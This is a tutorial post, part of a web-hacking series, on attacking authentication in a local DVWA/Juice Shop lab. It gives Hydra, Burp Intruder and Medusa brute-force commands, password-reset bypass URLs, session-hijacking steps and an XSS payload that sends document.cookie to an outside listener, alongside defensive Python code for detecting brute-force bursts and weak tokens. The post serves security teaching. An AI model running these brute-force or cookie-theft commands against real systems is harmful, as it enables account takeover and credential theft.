
Day 6: Authentication & Bruteforce Attacks
Password Attacks & Auth Bypass: Hydra, Burp Intruder & Logic Testing
Authentication vulnerabilities are a common entry point for attackers to gain unauthorized access to web applications. Parrot OS, a Debian-based Linux distribution optimized for cybersecurity, provides robust tools for testing authentication mechanisms. On Day 6 of this 7-day web application hacking series, we focus on mastering authentication attacks and bypass techniques. This article covers brute-forcing login forms with Hydra and Burp Intruder, bypassing password reset logic, using and generating wordlists with rockyou.txt and Crunch, and the basics of session token prediction and hijacking. All commands use example.com as the illustrative target, but testing must be conducted on your local lab (e.g., DVWA or OWASP Juice Shop from Day 1) to ensure ethical practices. Both graphical user interface (GUI) and command-line interface (CLI) methods are included, with additional tools like Medusa and CeWL to provide comprehensive coverage. By mastering these techniques, you will be equipped to identify and exploit authentication vulnerabilities ethically and effectively.
Verifying the Test Lab
Ensure your test lab from Day 1 (DVWA and OWASP Juice Shop) is operational before proceeding with authentication testing.
- Check LAMP Stack: Verify that Apache and MySQL are running.
  sudo systemctl status apache2
  sudo systemctl status mysql
- Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low” for easier testing.
- Access Juice Shop: Navigate to http://localhost:3000 to confirm OWASP Juice Shop is running.
- Verify Proxy Setup: Ensure Burp Suite (from Day 3) is configured with Firefox for request interception.
Ethical Note: All commands use example.com for illustrative purposes. Only test on systems you own or have explicit permission to assess, such as your local lab. Unauthorized testing of live systems like example.com is illegal and unethical.
Task: Verify that DVWA is accessible and set to “Low” security level, confirm OWASP Juice Shop is operational, and ensure Burp Suite is configured.
Outcome: Your test lab is ready for authentication and brute-force testing.
Brute-Forcing Login Forms
Brute-force attacks attempt to guess credentials by systematically trying combinations from a wordlist. Hydra and Burp Intruder are powerful tools for this purpose.
Hydra
Hydra is a CLI-based password cracking tool that supports various protocols, including HTTP and HTTPS forms.
- Basic HTTP POST Brute-Force: Attempts to brute-force the username admin with passwords from rockyou.txt against http://example.com/login.php. The string after the last colon, Invalid login, is the text Hydra expects in the response to a failed attempt; -t 4 limits Hydra to four parallel connections.
  hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4
- Multiple Users: Uses a list of usernames.
  hydra -L /path/to/users.txt -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4
- HTTPS Form: Targets an HTTPS form.
  hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4
- Output to File: Saves results to a file.
  hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -o hydra_results.txt -t 4
- DVWA Example: Brute-forces DVWA’s login form.
  hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" -t 4
Burp Intruder
Burp Intruder (Day 3) is a GUI-based tool for brute-forcing forms within Burp Suite.
- GUI Setup:
  - Intercept a login POST request to http://example.com/login.php or http://localhost/dvwa/login.php in Burp’s Proxy.
  - Send the request to Intruder (right-click > “Send to Intruder”).
  - In the “Positions” tab, set the password parameter as the attack position (e.g., password=§pass§).
  - In the “Payloads” tab, load /usr/share/wordlists/rockyou.txt.
  - In the “Options” tab, set a grep match for “Invalid login” to identify failed attempts.
  - Start the attack and review results for successful logins (e.g., different response lengths).
- CLI (Professional Edition): Automates an Intruder attack via the Burp REST API (requires setup).
  curl -X POST -d '{"url":"http://example.com/login.php","positions":"password","payloads":"file:///usr/share/wordlists/rockyou.txt"}' http://127.0.0.1:8080/api/intruder
Task: Use Hydra to brute-force DVWA’s login form and Burp Intruder to test http://example.com/login.php (in your lab) with rockyou.txt.
Outcome: You can perform brute-force attacks on login forms using Hydra and Burp Intruder.
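From the defender's side, the same attack is visible in the web server's access log as a burst of POSTs to the login endpoint. The following added example (not from the original post) runs that detection over a constructed Apache combined-log sample; the window and threshold are assumptions to tune per site, and the User-Agent check relies on Hydra's default string, which is only a secondary signal because any client can change it.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed Apache combined-log sample (addresses, times, sizes are made up): 10.0.0.5
# bursts POSTs at /login.php like a Hydra http-post-form run; 192.168.1.20 is one normal login.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2025:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
10.0.0.5 - - [10/Jun/2025:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
10.0.0.5 - - [10/Jun/2025:12:00:02 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
10.0.0.5 - - [10/Jun/2025:12:00:02 +0000] "POST /login.php HTTP/1.1" 302 215 "-" "Mozilla/5.0 (Hydra)"
192.168.1.20 - - [10/Jun/2025:12:00:05 +0000] "POST /login.php HTTP/1.1" 302 215 "-" "Mozilla/5.0 Firefox/126.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) '
                     r'[^"]*" (?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    # One combined-log line -> dict, or None when the line does not match the format.
    m = LINE_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return e

def detect_bruteforce(log_text, path="/login.php", window=60, threshold=4):
    """Return {ip: finding} for clients with at least `threshold` POSTs to `path` in any
    `window`-second span. An attempt whose (status, size) differs from the majority is
    flagged as a possible success: the same signal Hydra and Intruder key on."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        e = parse_line(line)
        if e and e["method"] == "POST" and e["path"] == path:
            by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        times = sorted(e["ts"] for e in evs)
        burst = max(sum(1 for t in times if 0 <= (t - start).total_seconds() <= window)
                    for start in times)
        if burst < threshold:
            continue
        shapes = Counter((e["status"], e["size"]) for e in evs)
        majority = shapes.most_common(1)[0][0]
        findings[ip] = {
            "burst": burst,
            "hydra_user_agent": any("(Hydra)" in e["ua"] for e in evs),
            "possible_success": any(s != majority for s in shapes),
        }
    return findings
```

Feed it your lab's /var/log/apache2/access.log after a Hydra run to see the same burst the tool produced.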
Password Reset Bypass Logic
Password reset mechanisms often contain logic flaws that allow attackers to bypass authentication.
Common Vulnerabilities
- Weak Token Generation: Predictable or short reset tokens.
- Insecure Reset Links: Links that expose user IDs or lack validation.
- Logic Flaws: Allowing direct access to reset endpoints without authentication.
Manual Testing
- Inspect Reset Flow:
  - Request a password reset for admin@example.com on http://example.com/reset.php.
  - Intercept the request in Burp Suite/ZAP to analyze parameters (e.g., user=admin).
  - Modify the user parameter to another user (e.g., user=test) and forward.
- Bypass Token Validation: Try predictable tokens (e.g., 12346, 00000) or remove the token parameter.
  http://example.com/reset.php?token=12345&user=admin
- Direct Endpoint Access: Attempt to set a new password without a valid token.
  http://example.com/reset.php?user=admin&new_password=test123
- DVWA Testing:
  - Navigate to DVWA’s “Weak Session IDs” or a custom vulnerable reset page.
  - Intercept the reset request and manipulate parameters (e.g., user_id).
Task: Test DVWA’s login form or a custom reset page for logic flaws by modifying parameters in Burp Suite/ZAP.
Outcome: You can identify and exploit password reset logic vulnerabilities.
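The reset flaws listed above come down to how the token is generated and how it is checked. This added example (teaching code, not DVWA's or any real reset page) puts a weak handler, with a counter token and a trusted user parameter, beside a hardened one; the class names and the 900-second lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Constructed teaching code, not from DVWA or any real application.
# Weak flow, matching the "Common Vulnerabilities" list: the token is a short
# counter, it is not bound to an account, and the user parameter is trusted.
class WeakReset:
    def __init__(self):
        self.counter = 12345
        self.issued = set()

    def request_reset(self, user):
        self.counter += 1            # 12346, 12347, ... anyone can guess the next one
        self.issued.add(str(self.counter))
        return str(self.counter)

    def set_password(self, user, token, new_password):
        # Any issued token resets ANY account: a token requested for "test"
        # also passes for user=admin, the cross-account flaw described above.
        return token in self.issued

# Hardened flow: 256-bit random token, only its hash stored, bound to the
# account, time-limited, single-use, and compared in constant time.
class HardenedReset:
    TTL = 900  # seconds a reset link stays valid

    def __init__(self, now=time.time):
        self.now = now               # injectable clock, so expiry is testable
        self.pending = {}            # user -> (sha256(token), expiry)

    def request_reset(self, user):
        token = secrets.token_urlsafe(32)
        self.pending[user] = (hashlib.sha256(token.encode()).digest(), self.now() + self.TTL)
        return token                 # delivered only to the account's registered e-mail

    def set_password(self, user, token, new_password):
        entry = self.pending.get(user)
        if entry is None or not token:
            return False             # no reset pending for this user, or token param removed
        digest, expiry = entry
        if self.now() > expiry:
            del self.pending[user]
            return False             # expired link
        if not hmac.compare_digest(digest, hashlib.sha256(token.encode()).digest()):
            return False             # wrong token for this account
        del self.pending[user]       # single use
        return True                  # caller now stores a hash of new_password
```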
Wordlists: rockyou.txt and Crunch
Effective brute-forcing relies on quality wordlists. Parrot OS includes rockyou.txt, and Crunch allows custom wordlist generation.
Using rockyou.txt
- Location: /usr/share/wordlists/rockyou.txt (may need extraction if gzipped):
  gunzip /usr/share/wordlists/rockyou.txt.gz
- Filter Wordlist: Creates a wordlist with passwords of 6–12 alphanumeric characters.
  grep -E '^[a-zA-Z0-9]{6,12}$' /usr/share/wordlists/rockyou.txt > filtered_rockyou.txt
- Hydra with rockyou.txt: The target is given as a host name; the http-post-form module supplies the protocol.
  hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4
Generating Wordlists with Crunch
- Basic Wordlist: Generates 6–8 character passwords (the default charset is lowercase letters, so the file is enormous; Crunch prints the size it will write before starting).
  crunch 6 8 -o passwords.txt
- Custom Charset: Generates 6-digit numeric passwords.
  crunch 6 6 0123456789 -o numbers.txt
- Pattern-Based: Generates passwords like admin123, admin456 (each % is one digit).
  crunch 8 8 -t admin%%% -o admin_passwords.txt
- Hydra with Crunch: Pipes Crunch output directly to Hydra. If your Hydra build does not accept - as a password file, write the list with crunch 6 6 0123456789 -o numbers.txt and pass that file to -P instead.
  crunch 6 6 0123456789 | hydra -l admin -P - example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4
Task: Use rockyou.txt to brute-force DVWA’s login form with Hydra, and generate a custom wordlist with Crunch for testing http://example.com/login.php (in your lab).
Outcome: You can use and create effective wordlists for brute-force attacks.
Session Token Prediction and Hijacking Basics
Session tokens (e.g., cookies) authenticate users after login. Weaknesses in token generation or handling can lead to session hijacking.
Session Token Prediction
- Inspect Tokens:
  - Use Burp Suite/ZAP to capture cookies from http://example.com/login.php or http://localhost/dvwa.
  - Look for predictable patterns (e.g., sequential IDs, timestamps).
- Test Predictability: Try incrementing the session ID (e.g., 12346).
  curl -b "session=12345" http://example.com/profile.php
- DVWA Testing: In DVWA’s “Weak Session IDs” module, generate multiple session IDs and check for patterns.
Session Hijacking
- Capture Session Cookie: Use Burp Suite/ZAP to intercept a login request and copy the PHPSESSID or equivalent cookie.
- Test Hijacking: Replace your_session_id with the captured cookie to access the session.
  curl -b "PHPSESSID=your_session_id" http://localhost/dvwa/
- XSS Integration (from Day 5): Steal cookies via XSS and use them in a curl request.
  <script>document.location='http://localhost:8000?c='+document.cookie</script>
Task: Capture a session cookie from DVWA, test for predictability, and attempt session hijacking using curl or Burp Suite.
Outcome: You understand the basics of session token prediction and hijacking.
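To make “check for patterns” concrete, here is an added example (not part of the original post) that classifies a sample of session IDs the way you would after collecting several from DVWA’s Weak Session IDs module. The three samples are constructed to mimic a counter, a timestamp and a CSPRNG token; the 64-bit entropy floor and the one-year timestamp window are assumptions.

```python
import math
import secrets
import time
from collections import Counter

# Constructed samples modelled on DVWA's "Weak Session IDs" levels, not captured data:
COUNTER_IDS = ["1", "2", "3", "4", "5"]                        # incrementing counter
TIMESTAMP_IDS = ["1718020800", "1718020801", "1718020803"]    # Unix time at login
RANDOM_IDS = [secrets.token_hex(16) for _ in range(5)]         # CSPRNG, 128 bits each

def _as_ints(ids):
    try:
        return [int(i) for i in ids]
    except ValueError:
        return None

def assess_session_ids(ids, now=None):
    """Classify a sample of session IDs from one endpoint. Findings:
    'sequential'  consecutive integers (a counter)
    'timestamp'   integers within a year of `now` (time-based)
    'low_entropy' under 64 bits estimated from the symbol distribution
    Caveat: character entropy cannot tell md5(counter) from random bytes, so a
    hashed-but-predictable scheme passes the third check; only the first two
    catch structure, and a hash-of-counter must be checked by hashing guesses."""
    if not ids:
        return {"findings": [], "approx_bits": 0.0, "repeats": 0}
    now = time.time() if now is None else now
    findings = []
    nums = _as_ints(ids)
    if nums and len(nums) > 1:
        if {b - a for a, b in zip(nums, nums[1:])} == {1}:
            findings.append("sequential")
        if all(abs(n - now) < 365 * 86400 for n in nums):
            findings.append("timestamp")
    sample = "".join(ids)
    probs = [c / len(sample) for c in Counter(sample).values()]
    bits_per_char = -sum(p * math.log2(p) for p in probs)
    approx_bits = bits_per_char * min(len(i) for i in ids)
    if approx_bits < 64:
        findings.append("low_entropy")
    return {"findings": findings, "approx_bits": round(approx_bits, 1),
            "repeats": len(ids) - len(set(ids))}
```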
Additional Tools: Medusa and CeWL
Parrot OS includes additional tools to enhance authentication attacks.
Medusa
Medusa is a CLI-based brute-forcing tool similar to Hydra.
- Basic Brute-Force: Medusa’s web-form module takes the form path, the POST fields (the first two empty fields receive the username and password) and the failure string.
  medusa -u admin -P /usr/share/wordlists/rockyou.txt -h example.com -M web-form -m FORM:"/login.php" -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"Invalid login"
- Output to File: Appends log output to a file with -O.
  medusa -u admin -P /usr/share/wordlists/rockyou.txt -h example.com -M web-form -m FORM:"/login.php" -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"Invalid login" -O medusa_results.txt
CeWL
CeWL generates custom wordlists by crawling a website for words.
- Basic Wordlist: Creates a wordlist from example.com.
  cewl http://example.com -w cewl_wordlist.txt
- Custom Depth: Crawls to a depth of 2.
  cewl http://example.com -d 2 -w cewl_wordlist.txt
- Use with Hydra:
  hydra -l admin -P cewl_wordlist.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" -t 4
Task: Use Medusa to brute-force DVWA’s login form and CeWL to generate a wordlist from http://localhost/dvwa for use with Hydra.
Outcome: You can enhance brute-forcing with additional tools and custom wordlists.
Practical Exercise
- Verify your DVWA and OWASP Juice Shop lab setup.
- Brute-force DVWA’s login form with Hydra and Burp Intruder using rockyou.txt.
- Generate a custom wordlist with Crunch and test it on http://example.com/login.php (in your lab).
- Test DVWA’s password reset or a custom reset page for logic flaws using Burp Suite/ZAP.
- Capture and test session cookies for predictability and hijacking in DVWA.
- Use Medusa and CeWL to perform additional brute-force attacks on DVWA.
Conclusion
Day 6 of this 7-day web application hacking series has equipped you with the skills to test authentication mechanisms using Parrot OS. By mastering brute-forcing with Hydra and Burp Intruder, bypassing password reset logic, generating wordlists with Crunch and CeWL, and understanding session token prediction and hijacking, you can identify and exploit authentication vulnerabilities in a controlled environment. These techniques are critical for ethical hacking and vulnerability assessment. Continue practicing in your lab, and prepare for Day 7, where you will explore advanced exploitation and reporting.
Next Steps:
- Experiment with additional wordlists and tools like John the Ripper.
- Test authentication challenges in OWASP Juice Shop.
- Engage with cybersecurity communities on platforms like X to share insights and learn best practices.